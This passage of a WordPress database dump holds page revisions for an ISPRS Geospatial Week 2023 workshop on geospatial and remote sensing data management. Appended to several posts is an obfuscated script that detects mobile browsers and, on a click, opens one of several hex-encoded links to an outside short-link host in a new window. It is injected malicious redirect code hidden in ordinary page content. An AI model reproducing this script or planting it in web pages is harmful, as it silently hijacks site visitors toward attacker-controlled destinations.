)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2022-11-04 21:17:05','2022-11-04 21:17:05','',2996,'https://gsw2023.com/?p=3023',0,'revision','',0),
(3024,1,'2022-11-04 21:18:17','2022-11-04 21:18:17','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 21:18:17','2022-11-04 21:18:17','',2993,'https://gsw2023.com/?p=3024',0,'revision','',0),
(3025,1,'2022-11-08 19:18:27','2022-11-08 19:18:27','<!-- wp:paragraph -->\n<p>Wuhan University, China (WGIII-1)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 